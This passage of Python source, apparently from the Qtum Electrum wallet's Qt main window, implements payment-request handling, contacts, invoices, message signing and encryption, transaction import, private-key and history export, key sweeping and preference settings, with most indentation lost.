vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid qtum URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.set_pay_from([])
self.rbf_checkbox.setChecked(False)
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
toolbar.setContentsMargins(1, 0, 1, 6)
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l, l.create_toolbar(visible=True))
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_smart_contract_tab(self):
from .smart_contract_list import SmartContractList
self.smart_contract_list = l = SmartContractList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.need_update.set()
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove %s from your list of contacts?")
% " + ".join(labels)):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
            with open(fn, 'wb') as f:
                f.write(pr.raw)
            self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self})
console.updateNamespace({'util': util, 'bitcoin': bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
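        # mkfunc gives every command its own closure over `method`, avoiding Python's
        # late-binding pitfall where all lambdas created in a loop would share the last name.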
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0] == '_' or m in ['network', 'wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from qtum_electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except (BaseException,) as e:
traceback.print_exc(file=sys.stdout)
self.show_error('{}:{}'.format(_('Failed to update password'), e))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _(
'Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
# if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
# return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
grid.addWidget(QLabel(_("Wallet type") + ':'), 0, 0)
grid.addWidget(QLabel(wallet_type), 0, 1)
grid.addWidget(QLabel(_("Script type") + ':'), 1, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 1, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key + 1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = ("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.")
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message('Invalid Qtum address.')
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message('Cannot sign messages with this type of address.' + '\n\n' + self.msg_sign)
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message('Address not in wallet.')
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message('Invalid Qtum address.')
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from qtum_electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from qtum_electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
        # if the user scanned a qtum URI
if str(data).startswith("qtum:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
# transactions are binary, but qrcode seems to return utf8...
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except (BaseException,) as e:
self.show_error((_('Could not decode QR code') + ':\n{}').format(e))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from qtum_electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' + _(
'It can not be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'qtum-electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
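            # Derive keys on a worker thread and report progress through Qt signals,
            # so exporting many addresses never freezes the GUI event loop.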
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(
lambda: e.setText("Please wait... %d/%d" % (len(private_keys), len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
                _("Qtum Electrum was unable to produce a private key export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent=4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/qtum-electrum-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electrum was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
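    # Writes one record per history item: CSV gets fixed columns (hash, label,
    # confirmations, value, timestamp); otherwise the same records are dumped as JSON.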
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.get_history()
lines = []
for item in history:
tx_hash, height, confirmations, timestamp, value, balance = item
if height>0:
if timestamp is not None:
time_string = format_time(timestamp)
else:
time_string = _("unverified")
else:
time_string = _("unconfirmed")
if value is not None:
value_string = format_satoshis(value, True)
else:
value_string = '--'
if tx_hash:
label = wallet.get_label(tx_hash)
else:
label = ""
if is_csv:
lines.append([tx_hash, label, confirmations, value_string, time_string])
else:
lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string})
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent = 4))
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit()
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet(BLACK_FG if get_address() else RED_FG)
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from qtum_electrum.wallet import sweep_preparations
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'))
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from qtum_electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_dynfee(x):
self.config.set_key('dynamic_fees', x == Qt.Checked)
self.fee_slider.update()
dynfee_cb = QCheckBox(_('Use dynamic fees'))
dynfee_cb.setChecked(self.config.is_dynfee())
dynfee_cb.setToolTip(_("Use fees recommended by the server."))
fee_widgets.append((dynfee_cb, None))
dynfee_cb.stateChanged.connect(on_dynfee)
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_e.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
rbf_policy = self.config.get('rbf_policy', 1)
rbf_label = HelpLabel(_('Propose Replace-By-Fee') + ':', '')
rbf_combo = QComboBox()
rbf_combo.addItems([_('Always'), _('If the fee is low'), _('Never')])
rbf_combo.setCurrentIndex(rbf_policy)
def on_rbf(x):
self.config.set_key('rbf_policy', x)
rbf_combo.currentIndexChanged.connect(on_rbf)
fee_widgets.append((rbf_label, rbf_combo))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet(GREEN_BG if validated else RED_BG)
else:
alias_e.setStyleSheet(RED_BG)
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
